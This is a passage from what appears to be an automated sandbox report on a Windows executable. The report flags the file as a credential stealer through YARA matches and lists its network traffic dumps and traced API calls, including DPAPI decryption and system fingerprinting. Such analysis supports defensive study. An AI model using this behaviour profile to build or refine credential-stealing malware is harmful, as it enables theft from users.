                                                                                  2024-12-09 21:35:18 UTC15331OUTData Raw: e5 b5 14 38 bf d1 39 a7 76 c7 c5 3a 34 f8 4f 8f 26 02 2c 5f 6d 2a 4d 98 7b c1 49 39 ad 1a fd 6d 25 7f 0f e1 24 78 cc 2e 72 95 bb 89 a4 50 c8 4c 32 4c 11 e4 85 e7 a7 e4 bb 65 34 6a 12 41 be 28 fe f7 15 f1 d3 2a 68 f0 c1 e8 89 2f 65 6f c4 56 41 ee 88 90 95 18 79 35 c0 b1 56 5d a9 dd e4 0c 9b ed 06 d2 73 af d6 bb eb c8 75 b5 d9 ea 3c 3b 60 db 4d a0 66 21 28 72 f4 b3 0c 8c 46 95 4c 17 58 24 f6 77 24 90 b2 b6 ca 32 a6 b2 2a 80 b7 ea 95 ac 0d 46 ff 1d bc b0 f4 51 92 d4 86 a0 b8 28 20 58 de b2 30 35 26 d8 88 8b 5c 19 d2 fd 14 fd b2 c1 fd 74 b1 37 94 ed ee a3 a5 e0 03 d3 3d 09 33 f2 c5 82 d0 bd 21 52 98 83 e7 9f b6 56 98 c4 43 c4 19 af 06 c2 e8 d2 ab ca e8 3d 04 e3 a6 d6 72 a4 22 14 d7 e4 e0 06 ab dd 75 31 5c c2 2e 8d ad 0d 45 98 d6 07 58 47 08 2f 2e a8 c4 44 76
                                                                                  Data Ascii: 89v:4O&,_m*M{I9m%$x.rPL2Le4jA(*h/eoVAy5V]su<;`Mf!(rFLX$w$2*FQ( X05&\t7=3!RVC=r"u1\.EXG/.Dv
                                                                                  2024-12-09 21:35:23 UTC1027INHTTP/1.1 200 OK
                                                                                  Date: Mon, 09 Dec 2024 21:35:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=54sn4vork2t617sdpe74575o1c; expires=Fri, 04-Apr-2025 15:21:59 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Whys3IiDnwMM%2BY%2BCWNCfRj7aw6FjIKoveReeHWhGYKWxM%2FHeHcnf9Q7V348ajYN%2B418LD8WfOrdoZJ5M%2BTDmvhQhWv6gp5T9HHjG3Z8tI0kXRHpU81dEnoOErltRalqQG9dyF4E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef81fd0a9807ca5-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1810&rtt_var=693&sent=291&recv=600&lost=0&retrans=0&sent_bytes=2846&recv_bytes=572798&delivery_rate=1562332&cwnd=243&unsent_bytes=0&cid=ca83778ef03667b2&ts=4146&x=0"


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Target ID:0
                                                                                  Start time:16:34:57
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                  Imagebase:0xc50000
                                                                                  File size:1'895'424 bytes
                                                                                  MD5 hash:52F0F216DFBB86683B1E318A0796DD81
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183576461.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183284410.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155738862.0000000001745000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184825039.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183365042.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183995653.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183909532.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184609958.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2084573871.0000000001745000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183070027.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184342033.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2120532040.0000000001745000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2182875665.000000000173E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184473776.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156261014.0000000001745000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183708520.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184119723.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184213865.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183174320.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183492043.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184688562.000000000173E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2183790933.000000000173F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.3%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:59.5%
                                                                                    Total number of Nodes:222
                                                                                    Total number of Limit Nodes:21
                                                                                    execution_graph 22145 c7e343 CoSetProxyBlanket 22151 c851c0 22152 c851dd 22151->22152 22153 c85219 22152->22153 22155 c8b480 LdrInitializeThunk 22152->22155 22155->22152 22242 c8b781 22243 c8b822 22242->22243 22245 c8bace 22243->22245 22246 c8b480 LdrInitializeThunk 22243->22246 22246->22245 22156 c7c6d7 22158 c7c700 22156->22158 22157 c7cbd4 GetPhysicallyInstalledSystemMemory 22157->22158 22158->22157 22159 c5ce55 22160 c5ce70 22159->22160 22163 c86f90 22160->22163 22162 c5ceb9 22164 c86fc0 22163->22164 22164->22164 22165 c871d6 SysAllocString 22164->22165 22169 c8750c 22164->22169 22167 c871fe 22165->22167 22166 c87536 GetVolumeInformationW 22170 c87558 22166->22170 22168 c87206 CoSetProxyBlanket 22167->22168 22167->22169 22168->22169 22172 c87226 22168->22172 22169->22166 22170->22162 22171 c874fa SysFreeString SysFreeString 22171->22169 22172->22171 22173 c5d6d0 22175 c5d760 22173->22175 22174 c5d7ae 22175->22174 22177 c8b480 LdrInitializeThunk 22175->22177 22177->22174 22252 c67e93 22256 c67e98 22252->22256 22254 c68066 22254->22254 22255 c680e6 22254->22255 22262 c6c360 RtlAllocateHeap LdrInitializeThunk 22254->22262 22256->22254 22256->22255 22256->22256 22258 c8d6c0 22256->22258 22259 c8d6e0 22258->22259 22260 c8d80e 22259->22260 22263 c8b480 LdrInitializeThunk 22259->22263 22260->22254 22262->22255 22263->22260 22178 ca92dc 22179 ca9663 VirtualAlloc 22178->22179 22181 ca9b1b 22179->22181 22264 c89b90 22265 c89bc0 22264->22265 22266 c89c2e 22265->22266 22274 c8b480 LdrInitializeThunk 22265->22274 22267 c89e01 22266->22267 22275 c89b40 22266->22275 22270 c89b60 RtlFreeHeap 22270->22267 22271 c89cb0 22273 c89d3e 22271->22273 22278 c8b480 LdrInitializeThunk 22271->22278 22273->22270 22274->22266 22279 c8ca60 22275->22279 22277 c89b4a RtlAllocateHeap 22277->22271 22278->22273 22280 c8ca80 22279->22280 22280->22277 22280->22280 22182 c7b65e 22183 c7b679 22182->22183 22186 c86c40 22183->22186 22187 c86c4e 22186->22187 22189 c86d33 22187->22189 22195 c8b480 LdrInitializeThunk 22187->22195 22191 c7d786 22189->22191 22192 c86e1b 22189->22192 22194 c8b480 LdrInitializeThunk 22189->22194 22192->22191 22196 c8b480 LdrInitializeThunk 22192->22196 22194->22189 22195->22187 22196->22192 22281 c8bf91 22283 c8bef0 22281->22283 22282 c8bff7 22283->22282 22286 c8b480 LdrInitializeThunk 22283->22286 22285 c8c01d 22286->22285 22197 c7bfda 22198 c7c000 22197->22198 22199 c7c0cb FreeLibrary 22198->22199 22200 c7c0dd 22199->22200 22201 c7c0ed GetComputerNameExA 22200->22201 22202 c7c140 GetComputerNameExA 22201->22202 22204 c7c210 22202->22204 22205 ca96ea VirtualAlloc 22206 ca9a11 22205->22206 22207 c5a960 22210 c5a990 22207->22210 22208 c5ae26 22210->22208 22211 c89b60 22210->22211 22212 c89b73 22211->22212 22213 c89b75 22211->22213 22212->22208 22214 c89b7a RtlFreeHeap 22213->22214 22214->22208 22287 c5ce23 CoInitializeSecurity 22288 c71020 22289 c71080 22288->22289 22290 c7102e 22288->22290 22294 c71140 22290->22294 22292 c710fc 22292->22289 22293 c6ef30 RtlAllocateHeap LdrInitializeThunk 22292->22293 22293->22289 22295 c71150 22294->22295 22295->22295 22296 c8d6c0 LdrInitializeThunk 22295->22296 22297 c7121f 22296->22297 22298 c8d920 22299 c8d940 22298->22299 22302 c8d98e 22299->22302 22304 c8b480 LdrInitializeThunk 22299->22304 22300 c8da2e 22302->22300 22305 c8b480 LdrInitializeThunk 22302->22305 22304->22302 22305->22300 22306 c5e2a9 22307 c5e2b5 22306->22307 22308 c5e673 CoUninitialize 22307->22308 22309 c5e690 22308->22309 22215 c8bc65 22216 c8bc90 22215->22216 22219 c8bcde 22216->22219 22222 c8b480 LdrInitializeThunk 22216->22222 22217 c8bd6f 22219->22217 22223 c8b480 LdrInitializeThunk 22219->22223 22221 c8bde7 22222->22219 22223->22221 22224 c80879 22227 c64a30 22224->22227 22226 c8087e CoSetProxyBlanket 22227->22226 22228 c587f0 22232 c587fc 22228->22232 22229 c58979 ExitProcess 22230 c58974 22237 c8b400 FreeLibrary 22230->22237 22232->22229 22232->22230 22236 c5cdf0 CoInitializeEx 22232->22236 22237->22229 22238 c66b7e 22240 c66b90 22238->22240 22239 c66d37 CryptUnprotectData 22241 c66d56 22239->22241 22240->22239 22241->22241 22310 c5ebbc 22311 c5ebc5 22310->22311 22336 c733a0 22311->22336 22313 c5ebcb 22344 c73a00 22313->22344 22315 c5ebeb 22350 c73d30 22315->22350 22317 c5ec0b 22358 c75920 22317->22358 22341 c733f0 22336->22341 22337 c734c6 22337->22313 22338 c73797 22338->22337 22338->22338 22386 c715f0 22338->22386 22340 c735f1 22340->22337 22340->22338 22343 c8d6c0 LdrInitializeThunk 22340->22343 22341->22337 22341->22338 22341->22340 22341->22341 22342 c8d6c0 LdrInitializeThunk 22341->22342 22342->22340 22343->22338 22347 c73aa0 22344->22347 22345 c73cf7 22345->22315 22347->22345 22348 c73c0f 22347->22348 22410 c8dfb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22347->22410 22409 c6eeb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22348->22409 22351 c73d3e 22350->22351 22412 c8dbd0 22351->22412 22353 c73cf7 22353->22317 22355 c73c0f 22355->22355 22411 c6eeb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22355->22411 22356 c73ba0 22356->22353 22356->22355 22416 c8dfb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22356->22416 22359 c5ec2b 22358->22359 22360 c75b80 22358->22360 22362 c75947 22358->22362 22368 c75bc5 22358->22368 22370 c76170 22359->22370 22418 c8b420 22360->22418 22362->22359 22362->22360 22362->22362 22365 c8dbd0 LdrInitializeThunk 22362->22365 22362->22368 22447 c8dfb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22362->22447 22363 c8dbd0 LdrInitializeThunk 22363->22368 22365->22362 22368->22359 22368->22363 22369 c8b480 LdrInitializeThunk 22368->22369 22427 c8dcf0 22368->22427 22437 c8e690 22368->22437 22369->22368 22371 c76190 22370->22371 22373 c761ee 22371->22373 22452 c8b480 LdrInitializeThunk 22371->22452 22372 c5ec34 22380 c76500 22372->22380 22373->22372 22375 c89b40 RtlAllocateHeap 22373->22375 22377 c76298 22375->22377 22376 c89b60 RtlFreeHeap 22376->22372 22379 c7630e 22377->22379 22453 c8b480 LdrInitializeThunk 22377->22453 22379->22376 22379->22379 22454 c76520 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 22380->22454 22401 c8d520 22386->22401 22388 c7163c 22388->22337 22389 c71630 22389->22388 22390 c89b40 RtlAllocateHeap 22389->22390 22391 c71674 22390->22391 22399 c7172f 22391->22399 22405 c8b480 LdrInitializeThunk 22391->22405 22393 c71d28 22394 c89b60 RtlFreeHeap 22393->22394 22396 c71d38 22394->22396 22395 c89b40 RtlAllocateHeap 22395->22399 22396->22388 22407 c8b480 LdrInitializeThunk 22396->22407 22399->22393 22399->22395 22400 c89b60 RtlFreeHeap 22399->22400 22406 c8b480 LdrInitializeThunk 22399->22406 22400->22399 22403 c8d540 22401->22403 22402 c8d66e 22402->22389 22403->22402 22408 c8b480 LdrInitializeThunk 22403->22408 22405->22391 22406->22399 22407->22396 22408->22402 22409->22345 22410->22347 22411->22353 22414 c8dbf0 22412->22414 22413 c8dcbf 22413->22356 22414->22413 22417 c8b480 LdrInitializeThunk 22414->22417 22416->22356 22417->22413 22419 c8b438 22418->22419 22420 c8b45a 22418->22420 22421 c8b465 22418->22421 22422 c8b446 22418->22422 22419->22421 22419->22422 22423 c89b40 RtlAllocateHeap 22420->22423 22424 c89b60 RtlFreeHeap 22421->22424 22425 c8b44b RtlReAllocateHeap 22422->22425 22426 c8b460 22423->22426 22424->22426 22425->22426 22426->22368 22428 c8dd10 22427->22428 22429 c8dd5e 22428->22429 22448 c8b480 LdrInitializeThunk 22428->22448 22430 c8df9c 22429->22430 22432 c89b40 RtlAllocateHeap 22429->22432 22430->22368 22434 c8ddf1 22432->22434 22433 c89b60 RtlFreeHeap 22433->22430 22436 c8de6f 22434->22436 22449 c8b480 LdrInitializeThunk 22434->22449 22436->22433 22436->22436 22438 c8e69f 22437->22438 22440 c8e7ee 22438->22440 22450 c8b480 LdrInitializeThunk 22438->22450 22439 c8ea97 22439->22368 22440->22439 22441 c89b40 RtlAllocateHeap 22440->22441 22443 c8e883 22441->22443 22446 c8e93e 22443->22446 22451 c8b480 LdrInitializeThunk 22443->22451 22444 c89b60 RtlFreeHeap 22444->22439 22446->22444 22447->22362 22448->22429 22449->22436 22450->22440 22451->22446 22452->22373 22453->22379

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 c715f0-c7163a call c8d520 3 c71641-c7169e call c64a00 call c89b40 0->3 4 c7163c 0->4 10 c716a0-c716a3 3->10 5 c71e46-c71e56 4->5 11 c716a5-c7171a 10->11 12 c7171c-c71720 10->12 11->10 13 c71722-c7172d 12->13 14 c71734-c7174d 13->14 15 c7172f 13->15 17 c71754-c7175f 14->17 18 c7174f 14->18 16 c717ec-c717ef 15->16 21 c717f3-c717f8 16->21 22 c717f1 16->22 19 c717db-c717e0 17->19 20 c71761-c717d1 call c8b480 17->20 18->19 24 c717e4-c717e7 19->24 25 c717e2 19->25 28 c717d6 20->28 26 c717fe-c71808 21->26 27 c71d2c-c71d65 call c89b60 21->27 22->21 24->13 25->16 29 c7180a-c7183c 26->29 36 c71d67-c71d6a 27->36 28->19 31 c71842-c71868 29->31 32 c71a1b-c71a1f 29->32 35 c7186a-c7186d 31->35 34 c71a23-c71a26 32->34 41 c71a2c-c71a42 call c89b40 34->41 42 c71a28-c71a2a 34->42 37 c7186f-c718a8 35->37 38 c718aa-c718cf call c71e60 35->38 39 c71de3-c71de9 36->39 40 c71d6c-c71de1 36->40 37->35 38->32 54 c718d5-c718fe 38->54 44 c71deb-c71df1 39->44 40->36 59 c71a46-c71a51 41->59 60 c71a44-c71a58 41->60 45 c71a5a-c71a5c 42->45 50 c71df5-c71e07 44->50 51 c71df3 44->51 47 c71a62-c71a85 45->47 48 c71d0b-c71d10 45->48 53 c71a87-c71a8a 47->53 57 c71d12-c71d16 48->57 58 c71d18-c71d1a 48->58 55 c71e0b-c71e11 50->55 56 c71e09 50->56 51->5 61 c71a8c-c71ab9 53->61 62 c71abb-c71af7 53->62 63 c71900-c71903 54->63 64 c71e3a-c71e3d 55->64 65 c71e13-c71e38 call c8b480 55->65 56->64 66 c71d1c 57->66 58->66 68 c71d1e-c71d22 59->68 60->45 61->53 69 c71af9-c71afc 62->69 70 c71905-c71948 63->70 71 c7194a-c71968 call c71e60 63->71 74 c71e41-c71e44 64->74 75 c71e3f 64->75 65->64 66->68 68->29 73 c71d28-c71d2a 68->73 76 c71b75-c71b79 69->76 77 c71afe-c71b73 69->77 70->63 85 c71977-c71994 71->85 86 c7196a-c71972 71->86 73->27 74->44 75->5 81 c71b7b-c71b86 76->81 77->69 83 c71b8d-c71ba2 81->83 84 c71b88 81->84 88 c71ba4 83->88 89 c71ba9-c71bb4 83->89 87 c71c49-c71c50 84->87 90 c71996 85->90 91 c71998-c71a19 call c57ff0 call c64630 call c58000 85->91 86->34 92 c71c54-c71c73 87->92 93 c71c52 87->93 94 c71c3a-c71c3d 88->94 89->94 95 c71bba-c71c30 call c8b480 89->95 90->91 91->34 99 c71c75-c71c78 92->99 93->92 97 c71c41-c71c44 94->97 98 c71c3f 94->98 105 c71c35 95->105 97->81 98->87 103 c71caa-c71cb0 99->103 104 c71c7a-c71ca8 99->104 107 c71cb2-c71cb6 103->107 108 c71cde-c71ce1 103->108 104->99 105->94 109 c71cb8-c71cbf 107->109 110 c71cf6-c71cfc 108->110 111 c71ce3-c71cf4 call c89b60 108->111 115 c71cc1-c71ccd 109->115 116 c71ccf-c71cd2 109->116 114 c71cfe-c71d01 110->114 111->114 114->48 119 c71d03-c71d09 114->119 115->109 120 c71cd4 116->120 121 c71cda-c71cdc 116->121 119->68 120->121 121->108
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: !@$$$,$,$/$/$=$?$`$`$`$a$a$a$b$b$b$c$c$c$x$y
                                                                                    • API String ID: 0-2322859148
                                                                                    • Opcode ID: e30aed928e2cf561e9c4d82f540615e51f5af2966a9954322990886b10cd818b
                                                                                    • Instruction ID: 1fa855289a5fbd8d6a862a91e822375d445be32d3924855d2e696ae21fa5a721
                                                                                    • Opcode Fuzzy Hash: e30aed928e2cf561e9c4d82f540615e51f5af2966a9954322990886b10cd818b
                                                                                    • Instruction Fuzzy Hash: 2232F37260C3808FD3248B2DC49536FFBE1ABD5314F1D892DE9E987392D6B989458B43

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 123 c86f90-c86fb8 124 c86fc0-c87006 123->124 124->124 125 c87008-c8701f 124->125 126 c87020-c8705b 125->126 126->126 127 c8705d-c8709a 126->127 128 c870a0-c870b2 127->128 128->128 129 c870b4-c870cd 128->129 131 c870cf 129->131 132 c870d7-c870e2 129->132 131->132 133 c870f0-c87122 132->133 133->133 134 c87124-c8717b 133->134 136 c87181-c871b2 134->136 137 c87526-c87556 call c8ce00 GetVolumeInformationW 134->137 138 c871c0-c871d4 136->138 142 c87558-c8755c 137->142 143 c87560-c87562 137->143 138->138 140 c871d6-c87200 SysAllocString 138->140 146 c87516-c87522 140->146 147 c87206-c87220 CoSetProxyBlanket 140->147 142->143 145 c87587-c8758e 143->145 148 c87590-c87597 145->148 149 c875a7-c875bf 145->149 146->137 150 c8750c-c87512 147->150 151 c87226-c8723a 147->151 148->149 152 c87599-c875a5 148->152 153 c875c0-c875d4 149->153 150->146 155 c87240-c87261 151->155 152->149 153->153 156 c875d6-c8760f 153->156 155->155 157 c87263-c872e3 155->157 158 c87610-c87650 156->158 163 c872f0-c87313 157->163 158->158 159 c87652-c8767f call c6dc20 158->159 164 c87680-c87688 159->164 163->163 165 c87315-c8733e 163->165 164->164 166 c8768a-c8768c 164->166 174 c874fa-c8750a SysFreeString * 2 165->174 175 c87344-c87366 165->175 167 c87570-c87581 166->167 168 c87692-c876a2 call c58070 166->168 167->145 171 c876a7-c876ae 167->171 168->167 174->150 177 c8736c-c8736f 175->177 178 c874f0-c874f6 175->178 177->178 179 c87375-c8737a 177->179 178->174 179->178 180 c87380-c873c8 179->180 182 c873d0-c873e4 180->182 182->182 183 c873e6-c873f4 182->183 184 c873f8-c873fa 183->184 185 c874df-c874ec 184->185 186 c87400-c87406 184->186 185->178 186->185 187 c8740c-c8741a 186->187 188 c8741c-c87421 187->188 189 c87467 187->189 191 c87446-c8744a 188->191 192 c87469-c874a2 call c57ff0 call c58e90 189->192 193 c8744c-c87455 191->193 194 c87430-c87438 191->194 203 c874a9-c874b1 192->203 204 c874a4 192->204 197 c8745c-c87460 193->197 198 c87457-c8745a 193->198 196 c8743b-c87444 194->196 196->191 196->192 197->196 200 c87462-c87465 197->200 198->196 200->196 205 c874b8-c874db call c58020 call c58000 203->205 206 c874b3 203->206 204->203 205->185 206->205
                                                                                    APIs
                                                                                    • SysAllocString.OLEAUT32(D080DE8F), ref: 00C871DC
                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00C87219
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00C87504
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00C8750A
                                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00C87552
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                    • String ID: !"$"#$%$.'()$.;$>C$C$p*v,${.] ${|
                                                                                    • API String ID: 1773362589-264043890
                                                                                    • Opcode ID: 7acc0089c3999fa1568a23c38b5d994971e206e40d03f948a194d3d3f27deecf
                                                                                    • Instruction ID: 6f713bb68674de392f5144b8046fa59f1a890204cf77aba7e9073d3d688f6565
                                                                                    • Opcode Fuzzy Hash: 7acc0089c3999fa1568a23c38b5d994971e206e40d03f948a194d3d3f27deecf
                                                                                    • Instruction Fuzzy Hash: AE020F7160C3009FD310DF64C881B6BBBE5EBC5308F24892CF6A59B2A1E779D945CB96

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 211 c5e2a9-c5e2d1 call c597b0 215 c5e2e0-c5e2f4 211->215 215->215 216 c5e2f6-c5e307 215->216 217 c5e310-c5e331 216->217 217->217 218 c5e333-c5e38e 217->218 219 c5e390-c5e3aa 218->219 219->219 220 c5e3ac-c5e3bd 219->220 221 c5e3bf-c5e3cf 220->221 222 c5e3db-c5e3e3 220->222 223 c5e3d0-c5e3d9 221->223 224 c5e3e5-c5e3e6 222->224 225 c5e3fb-c5e405 222->225 223->222 223->223 228 c5e3f0-c5e3f9 224->228 226 c5e407-c5e40b 225->226 227 c5e41b-c5e423 225->227 229 c5e410-c5e419 226->229 230 c5e425-c5e426 227->230 231 c5e43b-c5e445 227->231 228->225 228->228 229->227 229->229 232 c5e430-c5e439 230->232 233 c5e447-c5e44b 231->233 234 c5e45b-c5e467 231->234 232->231 232->232 235 c5e450-c5e459 233->235 236 c5e481-c5e5b7 234->236 237 c5e469-c5e46b 234->237 235->234 235->235 239 c5e5c0-c5e5d8 236->239 238 c5e470-c5e47d 237->238 238->238 240 c5e47f 238->240 239->239 241 c5e5da-c5e5fb 239->241 240->236 242 c5e600-c5e628 241->242 242->242 243 c5e62a-c5e68f call c5b6a0 call c597b0 CoUninitialize 242->243 248 c5e690-c5e6a4 243->248 248->248 249 c5e6a6-c5e6b8 248->249 250 c5e6c0-c5e6e1 249->250 250->250 251 c5e6e3-c5e73e 250->251 252 c5e740-c5e75a 251->252 252->252 253 c5e75c-c5e76d 252->253 254 c5e76f 